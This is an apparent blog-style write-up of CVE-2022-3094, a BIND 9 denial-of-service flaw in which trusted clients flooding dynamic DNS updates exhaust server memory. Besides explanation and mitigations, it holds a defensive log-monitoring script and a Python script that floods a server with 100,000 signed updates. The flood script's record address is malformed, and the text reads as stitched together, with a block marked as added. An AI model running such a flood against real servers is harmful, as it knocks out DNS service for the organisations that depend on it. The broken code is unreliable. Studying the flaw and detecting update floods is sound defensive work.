CVE-2022-3094 - Flooding BIND with Dynamic DNS Updates Can Crash Your DNS Server

CVE-2022-3094 is a denial-of-service (DoS) vulnerability that affects BIND 9, the popular open-source DNS server software. The issue allows a permitted client—one allowed to make dynamic zone updates—to crash the named process by sending a flood of dynamic DNS update requests, which can consume large amounts of memory before access permissions are even checked.

If the system runs out of available memory as a result, the DNS service will stop functioning, disrupting both your internal and external DNS lookups.

In this post, we'll break down how this works, which versions are affected, and walk through a simple demonstration of the vulnerability. We'll also point to the official advisories and discuss the practical impact for real-world DNS deployments.

The Problem in Simple Terms

When BIND (named) receives a dynamic DNS update (like from DHCP or a script), it allocates memory right away—before even checking if the client is allowed to make changes. If the client is *not* permitted, BIND releases the memory quickly. But, if the client is trusted (allowed to make changes), all the memory used during update processing is retained.

A flood of valid dynamic updates from a trusted client can eventually eat up all the free memory on the server, causing named to crash or be killed by the system’s Out-Of-Memory (OOM) killer.

Even though no in-the-wild attacks have been reported, deliberately exploiting this could result in a Denial of Service affecting any organizations that rely on BIND for their DNS infrastructure.

Affected versions and impact

- Affected: 9.16.8-S1 through 9.16.36-S1 (the Supported Preview Edition releases)
- Not affected by the crash: BIND versions prior to 9.16 are only vulnerable to service degradation (resource exhaustion), not to memory exhaustion that brings the process down.
- Important: the vulnerability can only be triggered by a client that is already *trusted* to send dynamic DNS updates for a zone, usually your DHCP server, administrators, or other internal network components.
- Impact: BIND crashes or the OS kills the process.
- Untrusted clients and rejected updates do not pose a significant risk, since the memory is released promptly when the update is denied.
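Because only accepted updates keep their memory allocated, a monitor for this issue should count accepted updates per trusted source and ignore the denied ones. The following is an added example, not code from the original post: it parses BIND-style "update" and "security" log lines (the line format is an assumption about BIND's logging, and the sample lines are constructed) and flags any client/key pair whose accepted updates exceed a threshold inside a sliding time window.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Assumed shape of BIND's "update" (accepted) and "security" (denied) log lines.
LINE_RE = re.compile(
    r"^(?P<ts>\d{2}-\w{3}-\d{4} \d{2}:\d{2}:\d{2}\.\d{3}) (?P<cat>update|security): \w+: "
    r"client @0x[0-9a-f]+ (?P<ip>[\d.]+)#\d+(?:/key (?P<key>[\w.-]+))?: (?P<msg>.*)$"
)

def parse(line):
    """Return (timestamp, client_ip, tsig_key, accepted) or None for unrelated lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d-%b-%Y %H:%M:%S.%f")
    accepted = m["cat"] == "update" and m["msg"].startswith("updating zone")
    return ts, m["ip"], m["key"], accepted

def find_update_floods(lines, window_s=10.0, threshold=100):
    """Map (ip, key) -> peak count for sources whose *accepted* updates exceed
    `threshold` inside any sliding window of `window_s` seconds. Denied updates
    are skipped: named frees their memory at once, so they add no pressure."""
    recent, peak = defaultdict(deque), {}
    for line in lines:
        rec = parse(line)
        if rec is None or not rec[3]:
            continue
        ts, ip, key, _ = rec
        q = recent[(ip, key)]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_s:
            q.popleft()
        if len(q) > threshold:
            peak[(ip, key)] = max(peak.get((ip, key), 0), len(q))
    return peak

def build_sample_log():
    """Constructed sample, not a real capture: a trusted DHCP key sends 150 accepted
    updates in 1.5 s, an admin key sends 5, and an untrusted host is denied 200 times."""
    def stamp(ms):
        return f"26-Jan-2023 21:15:{ms // 1000:02d}.{ms % 1000:03d}"
    ok = ("{} update: info: client @0x7f3a0c012340 {}#53422/key {}: updating zone "
          "'example.com/IN': adding an RR at 'host{}.example.com' A 10.0.0.{}")
    denied = "{} security: info: client @0x7f3a0c0123a0 203.0.113.9#40001: update 'example.com/IN' denied"
    lines = [ok.format(stamp(i * 10), "192.168.1.50", "dhcp-key", i, i % 254 + 1) for i in range(150)]
    lines += [ok.format(stamp(i * 100), "192.168.1.20", "admin-key", i, i % 254 + 1) for i in range(5)]
    lines += [denied.format(stamp(i * 5)) for i in range(200)]
    return lines
```

Tune `window_s` and `threshold` to the normal update rate of your DHCP server; a sustained burst from a single key well above that baseline is the signal to investigate before named runs out of memory.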

Example Code: Python Dynamic DNS Update Flood

Here’s a simple example in Python using the dnspython library to flood a BIND server with dynamic updates. (Never use against systems you do not own!)

```python
import dns.query
import dns.tsigkeyring
import dns.update
import time

# TSIG key that the server already trusts for dynamic updates (placeholder secret)
keyring = dns.tsigkeyring.from_text({
    'mykeyname.': 'base64_shared_secret_here'
})

zone = 'example.com.'
server = '192.168.1.10'

# Flood 100,000 signed DNS updates over TCP
for i in range(100000):
    update = dns.update.Update(zone, keyring=keyring)
    record_name = f'host{i}'
    update.replace(record_name, 60, 'A', f'10...{i%255}')
    response = dns.query.tcp(update, server)
    print(f'Update {i}: {response.rcode()}')
    time.sleep(.01)  # Remove or adjust to change flood rate
```

References and Further Reading

- ISC Official Advisory for CVE-2022-3094
- NIST NVD Record
- BIND 9 Documentation: Dynamic Update
- Dynamic DNS updates in dnspython

- Exploit reliability: High (if update access is available and the server is not specially protected)
- Impact: Denial of Service by memory exhaustion; the server crashes or is killed, and all DNS in the affected zones stops resolving
- Mitigations: Patch/update BIND, and carefully limit which systems and keys are allowed to perform dynamic DNS updates.

Conclusion

CVE-2022-3094 shows that even trusted clients can be a risk if bugs exist in software design. While it's not a remote unauthenticated exploit, it is dangerous in multi-user environments or where compromise of allowed systems is possible.

Stay patched, restrict permissions, and keep your DNS infrastructure secure.

Original sources

- ISC CVE-2022-3094 Advisory
- NIST NVD Entry

Timeline

Published on: 01/26/2023 21:15:00 UTC
Last modified on: 02/03/2023 18:24:00 UTC